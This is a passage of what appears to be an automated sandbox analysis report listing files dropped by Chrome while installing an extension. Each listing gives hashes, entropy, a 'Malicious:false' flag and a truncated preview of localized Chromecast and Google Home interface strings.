                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "......".. },.. "1213957982723875920": {.. "message": "......... ..... ...... ......... ............ ..... ....?".. },.. "128276876460319075": {.. "message": "........ ...".. },.. "1428448869078126731": {.. "message": "....... .......".. },.. "1522140683318860351": {.. "message": "....... ....... ..... ..... ...... ....... ....".. },.. "1550904064710828958": {.. "message": ".... ..... .....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": ".........".. },.. "1850397500312020388": {.. "message": "...... $START_LINK$ Goo
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ms\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15330
                                                                                                                                                                                Entropy (8bit):5.193447909498091
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:rCprBbx+Fkc4kYPr/pEt4EpXlIoV6c8TEKdl:CrYjer/mOE4oV6uml
                                                                                                                                                                                MD5:09D75141E0D80FBD3E9E92CE843DA986
                                                                                                                                                                                SHA1:B24EAB4B1242C31B69514D77BC1DB36A3F648F40
                                                                                                                                                                                SHA-256:8F1DBDEFD910AD88BEEC7956619CDB34391D6E69254C3A7497E8F87134AE8B5C
                                                                                                                                                                                SHA-512:935C69481F1555787FCB9A5490B3188B348284B600359239742A7D802ADD5CC8A30CC1F0942D52E620DFB388787FCD69B548BBAC590110245DF5763367A2DD5A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Tidak bergerak".. },.. "1213957982723875920": {.. "message": "Antara yang berikut, manakah yang terbaik menggambarkan rangkaian anda?".. },.. "128276876460319075": {.. "message": "Penemuan Peranti".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Sila cuba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Kelantangan".. },.. "1850397500312020388": {.. "message": "Adakah anda dapat melihat Chromecast anda dalam $START_LINK$ apl Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\nb\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15155
                                                                                                                                                                                Entropy (8bit):5.2408655429422515
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:5Pvl9prfckKJ+3kEUroBsL78Z4XyfhV6c8TEKdl:9vhrkDJ+UEUroE78OCJV6uml
                                                                                                                                                                                MD5:ED99169537909291BCC1ED1EA7BB63F0
                                                                                                                                                                                SHA1:5F72D51B6DBE8C622EF33D2B2AEBD7E9E20DAFB3
                                                                                                                                                                                SHA-256:65B6598225ADA1E14EE9CB76CA863708E8F9EE0724B4EDC8F9508532BD631BAB
                                                                                                                                                                                SHA-512:452704BFC109EEBDE7C9D83CFC9EADA7471989CA7D30F5C8754B6C2B026100A87C8D9ED49A09E398CEBA8B837829E2D9C6772EEEAF1AFA506F35BDDF25C20C23
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Fryser".. },.. "1213957982723875920": {.. "message": "Hvilket av f.lgende eksempler beskriver nettverket ditt best?".. },.. "128276876460319075": {.. "message": "Enhetsgjenkjenning".. },.. "1428448869078126731": {.. "message": "Videojevnhet".. },.. "1522140683318860351": {.. "message": "Tilkoblingen mislyktes. Pr.v p. nytt.".. },.. "1550904064710828958": {.. "message": "Jevn".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Ser du Chromecasten din i $START_LINK$Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START_SPAN":
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\nl\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15327
                                                                                                                                                                                Entropy (8bit):5.221212691380602
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:0Yiepr1oh/Kd1sko8MrIpL72Izq8pXL2vVRmdKV6c8TEKdl:04r60Xo8MrIpLpRXL0G0V6uml
                                                                                                                                                                                MD5:E9236F0B36764D22EEC86B717602241E
                                                                                                                                                                                SHA1:DE82B804B18933907095DEF3F2EF164C1BB5F9B6
                                                                                                                                                                                SHA-256:300F4F7C45EBE39EAAF40776C28D0A399A710699AAB58E9A8D43A6FD2DD00376
                                                                                                                                                                                SHA-512:BB8A81D5D1C3FB3CA05149137852CAC213DEECB0437DA85472D5C03DAEFFE28D73007D7921740E56FE8B79544F529670600D47B86C4F27BF45C090B4D55F23F7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Loopt vast".. },.. "1213957982723875920": {.. "message": "Welke beschrijving past het beste bij je netwerk?".. },.. "128276876460319075": {.. "message": "Apparaatdetectie".. },.. "1428448869078126731": {.. "message": "Vloeiendheid van de video".. },.. "1522140683318860351": {.. "message": "Kan geen verbinding maken. Probeer het opnieuw.".. },.. "1550904064710828958": {.. "message": "Vloeiend".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Zie je je Chromecast in de $START_LINK$Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\pl\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15418
                                                                                                                                                                                Entropy (8bit):5.346020722930065
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:PBUprktnFwP5GkzF0r2Q3SdIucDGGmPlTV6c8TEKdl:ur2CDur2kT9aGydV6uml
                                                                                                                                                                                MD5:8254020C39A5F6C1716639CC530BB0D6
                                                                                                                                                                                SHA1:A97A70427581ADA902CA73C898825F7B4B4FAC8F
                                                                                                                                                                                SHA-256:2F4E4FC6AEB4A8E7F0E0DCE220D66E763F4EBF1FA79985834D636C6692FEA3E8
                                                                                                                                                                                SHA-512:9A2CD0F061A943CE04789FF259ECE5B3CCA11EBB6C1DF16C703F70394A5F89415E8EFB79CFB4646FC07FD261170A74602644FFF02ABD38548895CDF7DAB68EB6
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zatrzymuje si.".. },.. "1213957982723875920": {.. "message": "Kt.ra z tych opcji najlepiej opisuje Twoj. sie.?".. },.. "128276876460319075": {.. "message": "Wykrywanie urz.dze.".. },.. "1428448869078126731": {.. "message": "P.ynno.. obrazu".. },.. "1522140683318860351": {.. "message": "Nie uda.o si. nawi.za. po..czenia. Spr.buj ponownie.".. },.. "1550904064710828958": {.. "message": "P.ynna".. },.. "1636686747687494376": {.. "message": "Idealna".. },.. "1802762746589457177": {.. "message": "G.o.no..".. },.. "1850397500312020388": {.. "message": "Czy Chromecasta wida. w.$START_LINK$aplikacji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\pt\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15475
                                                                                                                                                                                Entropy (8bit):5.239856689212255
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:L9PpriI0RYHf8kfrvvI/99T+BEsV6c8TEKdl:LrkYPfrgsV6uml
                                                                                                                                                                                MD5:FABD5D64267F0E6D7BE6983AB8704F8C
                                                                                                                                                                                SHA1:D4DAAD0FF5C461C51E6C1FD22B86AFC5B13E123F
                                                                                                                                                                                SHA-256:D82DCA262FF005668B252B478DEDAAC4A5C1E417AF9DE57C22F169A6680183AE
                                                                                                                                                                                SHA-512:AD8B2129DCB4F232AEDD7A2B90AF2EFA43497F9118C27AB843D279F7B0EDF70AF95251B46C8098AA831FEC0B2AF6AB0308D3DCFD9AE87BEA8AD9E0D1032E0F8B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Congela".. },.. "1213957982723875920": {.. "message": "Qual das seguintes alternativas melhor descreve sua rede?".. },.. "128276876460319075": {.. "message": "Detec..o de dispositivos".. },.. "1428448869078126731": {.. "message": "Suavidade da reprodu..o do v.deo".. },.. "1522140683318860351": {.. "message": "Falha na conex.o. Tente novamente.".. },.. "1550904064710828958": {.. "message": "Suave".. },.. "1636686747687494376": {.. "message": "Perfeita".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": ". poss.vel encontrar seu Chromecast no $START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ro\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15655
                                                                                                                                                                                Entropy (8bit):5.288239072087021
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:rpzpr34BALdvonekYFJr2RlYh7YU95cep3AnjYCV6c8TEKdl:HrIqLdv0VYFJrT95c8VCV6uml
                                                                                                                                                                                MD5:75E16A8FB75A9A168CFF86388F190C99
                                                                                                                                                                                SHA1:C27CE4C1DB3DF2D232925C73DC9AC1FA24DAD396
                                                                                                                                                                                SHA-256:9C4716FF42A730F1E7725F0D9E703F311E79FDA31F85B4BB0B8863FC3C27AB9D
                                                                                                                                                                                SHA-512:9E0BF56560B1D73F9706FF6AA2D5628CBE58EFCE197899A7EE686B2395D0FA2F9927538DD9B7B152CE2DED4708A210DA3DD6F5350E62AF853E809782997B1922
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Redare cu bloc.ri".. },.. "1213957982723875920": {.. "message": "Care dintre urm.toarele descrie cel mai bine re.eaua ta?".. },.. "128276876460319075": {.. "message": "Descoperirea dispozitivelor".. },.. "1428448869078126731": {.. "message": "Calitatea red.rii videoclipului".. },.. "1522140683318860351": {.. "message": "Conexiunea nu s-a stabilit. .ncerca.i din nou.".. },.. "1550904064710828958": {.. "message": "Redare lin.".. },.. "1636686747687494376": {.. "message": "Redare perfect.".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Chromecastul dvs. apare .n $START_LINK$ aplica.ia Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ru\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):17686
                                                                                                                                                                                Entropy (8bit):5.471928545648783
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:Pu6PQpr19XtZkmVpFQkeVBSr/7Nq5k8TyIeBcrvV6c8TEKdl:ir7Q+LASrWk8CirvV6uml
                                                                                                                                                                                MD5:8EF94823972EA8D2FC9BB7EC09AB1846
                                                                                                                                                                                SHA1:4171DC9CE9D82FDA5A280517A1FE58C907D75CE3
                                                                                                                                                                                SHA-256:1009DB9FFA64E411B31E0780EBA43B9C9F8B05B5AC8CCA9A38514650261ABB0A
                                                                                                                                                                                SHA-512:83CEC6CF43F4A5A998B987DA6B6F236B36078C560F1CD79366AEBF2950ECD881F0B3ECC1C0769D911381B4A1D5901121E3620CA1AC2401BDE12642BE64EFD67A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".........".. },.. "1213957982723875920": {.. "message": "..... .. ......... .... ........ ............. ..... ....?".. },.. "128276876460319075": {.. "message": "........ . ............ .........".. },.. "1428448869078126731": {.. "message": "............... .....".. },.. "1522140683318860351": {.. "message": ".. ....... .......... ........... ......... ........".. },.. "1550904064710828958": {.. "message": "....... ...............".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message": ".........".. },.. "1850397500312020388": {.. "message": ".. ...... .... .......... Chromecast . $START_LINK$........
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\sk\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15740
                                                                                                                                                                                Entropy (8bit):5.409596551150113
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:PIwprzrAXVZdrkF9PMZq6rTxnfKVSk7bVV6c8TEKdl:jrojd4F94q6rRsdVV6uml
                                                                                                                                                                                MD5:C314FAC15AFF6A2EE9C732C64AB5A66D
                                                                                                                                                                                SHA1:D51F3362B5FDD2F3756DE42D7D6227DC818C6344
                                                                                                                                                                                SHA-256:8EE2A25A09D6D0F89063FAA34BA2BC4DB505DD31FE6D5064C5D6E1E153721484
                                                                                                                                                                                SHA-512:C0387992BFD6D5EA7781A6A8112DDAF9759A3FCE0B0D954F024B4368EBAE132EB5FB6D59DE69F7C015E049339F6A170F1B41236E222D09FF41020F912E9DCD3C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zam.za".. },.. "1213957982723875920": {.. "message": "Ktor. z nasleduj.cich skuto.nost. najlep.ie popisuj. va.u sie.?".. },.. "128276876460319075": {.. "message": "Vyh.ad.vanie zariaden.".. },.. "1428448869078126731": {.. "message": "Plynulos. videa".. },.. "1522140683318860351": {.. "message": "Pripojenie zlyhalo. Sk.ste to znova.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "V.born.".. },.. "1802762746589457177": {.. "message": "Hlasitos.".. },.. "1850397500312020388": {.. "message": "Vid.te svoj Chromecast v.$START_LINK$aplik.cii Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\sl\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15628
                                                                                                                                                                                Entropy (8bit):5.292871661441512
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:Ppp0prwFOhNkcUw4kjkNOD7r31RdeYqakV6c8TEKdl:0rXjYwy4Xr34AkV6uml
                                                                                                                                                                                MD5:F60AB4E9A79FD6F32909AFAC226446B3
                                                                                                                                                                                SHA1:07C9E383D4488BEBE316CA86966FC728F55A2E32
                                                                                                                                                                                SHA-256:CDE581E6E7CF0136B003B45549E3BBEE7B67B74ADD786A8D5607BFDAD1DE7B87
                                                                                                                                                                                SHA-512:F6A7673A8EFDB7FF74D7B83DD4BCB3683031DB7FBFE6654F6311CBA53EC42F3E45CE2B42A6E385F868271BBDD348272ACF9CE304E2DB52A10B36D24C7B03114F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zamrzne".. },.. "1213957982723875920": {.. "message": "Kaj od tega najbolje opi.e va.e omre.je?".. },.. "128276876460319075": {.. "message": "Odkrivanje naprav".. },.. "1428448869078126731": {.. "message": "Teko.e predvajanje videoposnetka".. },.. "1522140683318860351": {.. "message": "Vzpostavitev povezave ni uspela. Poskusite znova.".. },.. "1550904064710828958": {.. "message": "Teko.e".. },.. "1636686747687494376": {.. "message": "Odli.no".. },.. "1802762746589457177": {.. "message": "Glasnost".. },.. "1850397500312020388": {.. "message": "Ali je Chromecast viden v $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\sr\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):17769
                                                                                                                                                                                Entropy (8bit):5.433657867664831
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:AtUpr9riVEviVutkeV74ErILfWloyWR5Roxj2V6c8TEKdl:AGr1pvtuWDrS9Sj2V6uml
                                                                                                                                                                                MD5:4E233461D805CA7E54B0B394FFF42CAB
                                                                                                                                                                                SHA1:77F30833FC73A4C02C652C9E5A6EAFE9C3988A30
                                                                                                                                                                                SHA-256:E1E1C64213EBF2CFEB7BA83E51B697CEA449B3A8B279B1024B859228DE869879
                                                                                                                                                                                SHA-512:7288B11E9F46CF8138E0F8305E5E43CCCCCAD75F2D37EB2515C6BD54064FDC511A5872F0A940FA44A0B1B2355D2E0AED12A0D53267AC501B4E5CB6DDE43B000D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "......... ..".. },.. "1213957982723875920": {.. "message": ".... .. ........ ...... ....... ....... .....?".. },.. "128276876460319075": {.. "message": "......... .......".. },.. "1428448869078126731": {.. "message": "........ ............ ..... ......".. },.. "1522140683318860351": {.. "message": ".......... .... ....... ........ .......".. },.. "1550904064710828958": {.. "message": "... .......".. },.. "1636686747687494376": {.. "message": ".......".. },.. "1802762746589457177": {.. "message": "...... .....".. },.. "1850397500312020388": {.. "message": "...... .. .. ...... Chromecast . $START_LINK$.......... Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\sv\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15135
                                                                                                                                                                                Entropy (8bit):5.258962752997426
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:LY5pr2y3Lm3kONgMr6nxJNuyF5JTpg2NOV6c8TEKdl:Yr5DMrAfpOV6uml
                                                                                                                                                                                MD5:897DAE6B0CF0FDE42648F0B47CB26E06
                                                                                                                                                                                SHA1:E1F5F5F65AF34FF9484AB2B01E571EAF19BA23D0
                                                                                                                                                                                SHA-256:52656C24F6F6D0F3B3FC01E9504C4D5CEB85624F1B22E974CA675DD0E94EB82D
                                                                                                                                                                                SHA-512:399DEACFE61F4AF9B24AAA0357D30149CC49DA7825295933D3AE006714B5DE7AC5FCB9EC5340B0E3AB4ABF25641032BBBB5B7D578CD204F4EDEAFE6E08C55663
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Fastnar tillf.lligt".. },.. "1213957982723875920": {.. "message": "Vilket av f.ljande beskriver ditt n.tverk b.st?".. },.. "128276876460319075": {.. "message": "Enhetsidentifiering".. },.. "1428448869078126731": {.. "message": "J.mn videouppspelning".. },.. "1522140683318860351": {.. "message": "Det gick inte att ansluta. F.rs.k igen.".. },.. "1550904064710828958": {.. "message": "Flyter p.".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Volym".. },.. "1850397500312020388": {.. "message": "Visas din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\sw\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15156
                                                                                                                                                                                Entropy (8bit):5.216902945207334
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:6GprWbq4takN4kbvrwJAV5HeY9NVUpnV6c8TEKdl:nrol7rRkpnV6uml
                                                                                                                                                                                MD5:EC233129047C1202D87DC140F7BA266D
                                                                                                                                                                                SHA1:537E4C887428081365D028F32C53E3C92F29AAA6
                                                                                                                                                                                SHA-256:28EDBC5C4858217811D45CAA215710E452C8926E4DE99F810001AD664D08BE0D
                                                                                                                                                                                SHA-512:2E3F9BA1EA9EEF921E76B46B5EF2404B3B77B61F18CF67CC78C23C62202227F678A3DBE9C730E42A310800914DC53F25E8B2FBF461839DE33D3501B0BCB4EC8D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Inasita kucheza".. },.. "1213957982723875920": {.. "message": "Ni gani kati ya zifuatazo inaelezea mtandao wako vizuri?".. },.. "128276876460319075": {.. "message": "Kupata Kifaa".. },.. "1428448869078126731": {.. "message": "Ulaini wa Kutiririsha Video".. },.. "1522140683318860351": {.. "message": "Imeshindwa kuunganisha. Tafadhali jaribu tena.".. },.. "1550904064710828958": {.. "message": "Laini".. },.. "1636686747687494376": {.. "message": "Bora".. },.. "1802762746589457177": {.. "message": "Sauti".. },.. "1850397500312020388": {.. "message": "Je, unaweza kuona Chromecast yako katika $START_LINK$ programu ya Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ta\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20531
                                                                                                                                                                                Entropy (8bit):5.2537196877590056
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:I0N4prlczmbWIO0KISBZdMx4kLQ7rgEsZatRoFkJL+KJtjV6c8TEKdl:0r/TUrRVjV6uml
                                                                                                                                                                                MD5:C50C5D2EDFC79DBDCBD5A58A027A3231
                                                                                                                                                                                SHA1:14314D760A18C39F06CD072CF5843832AFB86689
                                                                                                                                                                                SHA-256:EEB0E89D5AD92B80FF08F88533A111DB3416D7C3860C64227D1CC8B7C2B58298
                                                                                                                                                                                SHA-512:A241084C44260C239CB8E6736AB7F7D1988142DDA6CAAD9F907FB42970BE56EC8DA6956BFBE97F926C6EFA32B750F1F57815980494BC31D27DF609C04421AD42
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "....... .........".. },.. "1213957982723875920": {.. "message": "................ ... ...... .............. ...... ........ ...........?".. },.. "128276876460319075": {.. "message": "...... .............".. },.. "1428448869078126731": {.. "message": ".......... ..... .....".. },.. "1522140683318860351": {.. "message": "...... ............ ........ .........".. },.. "1550904064710828958": {.. "message": "..... ......".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message": "......."
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\te\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20495
                                                                                                                                                                                Entropy (8bit):5.301590673598541
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:hcFQcIrxhljbwSb4V6Icdbf1crfrCk0ODzB+relGZqsItV6uml:KcNbw4b2reSob26uml
                                                                                                                                                                                MD5:F740F25488BE253FCF5355D5A7022CEE
                                                                                                                                                                                SHA1:203A8DF19BA5A602A43DE18E99A6615D950C450E
                                                                                                                                                                                SHA-256:5B9C96CB5D62510836B321EB9CEEF23865BB9D4DC4DE7716E90A858E00701FDF
                                                                                                                                                                                SHA-512:3FB6E32D26EEAADB94D594A5B61930B003B4DA09C282A2ABF063A4502AA725FB88E4801F8A2443CD46137BEDAE5DFD2359DCA3506EE416713D08DF6430065725
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "........".. },.. "1213957982723875920": {.. "message": "..... .......... ... .. ........... ....... ........ ............?".. },.. "128276876460319075": {.. "message": "..... ..... ....".. },.. "1428448869078126731": {.. "message": "...... ...... ......".. },.. "1522140683318860351": {.. "message": "........ .......... ...... ..... ..............".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": "......... ....".. },.. "1802762746589457177": {.. "message": "........".. },.. "185039750031202038
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\th\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):18849
                                                                                                                                                                                Entropy (8bit):5.3815746250038305
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:GhjwMfr4c/ey18Ym7ZepIfa1hea0KEr2ucpYxcixh8V6uml:GhjwMfccGy18Ym7ZiIfa1hea0KEKucp2
                                                                                                                                                                                MD5:9F926FCB8BAEA23453B99EA162CCDEA1
                                                                                                                                                                                SHA1:04D1E45591C0435A39DCA00A81E83E68585E8B64
                                                                                                                                                                                SHA-256:100463C587F549C964A4EB21EA38EA1B4ADEF11E927FAC8FF884623B77202C02
                                                                                                                                                                                SHA-512:F226278DDF2D1995961690895361AB7B5D221C5E36D7767BBA71F36716C27B28210F85DC7DB4D2FC61B048FE2D058EE76EFBF2AD2A9714375149C4D09E18BE2B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "....".. },.. "1213957982723875920": {.. "message": ".............................................".. },.. "128276876460319075": {.. "message": "...............".. },.. "1428448869078126731": {.. "message": "....................".. },.. "1522140683318860351": {.. "message": "................... ...............".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": "..........".. },.. "1802762746589457177": {.. "message": "..........".. },.. "1850397500312020388": {.. "message": ".......... Chromecast ..... $
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\tr\messages.json
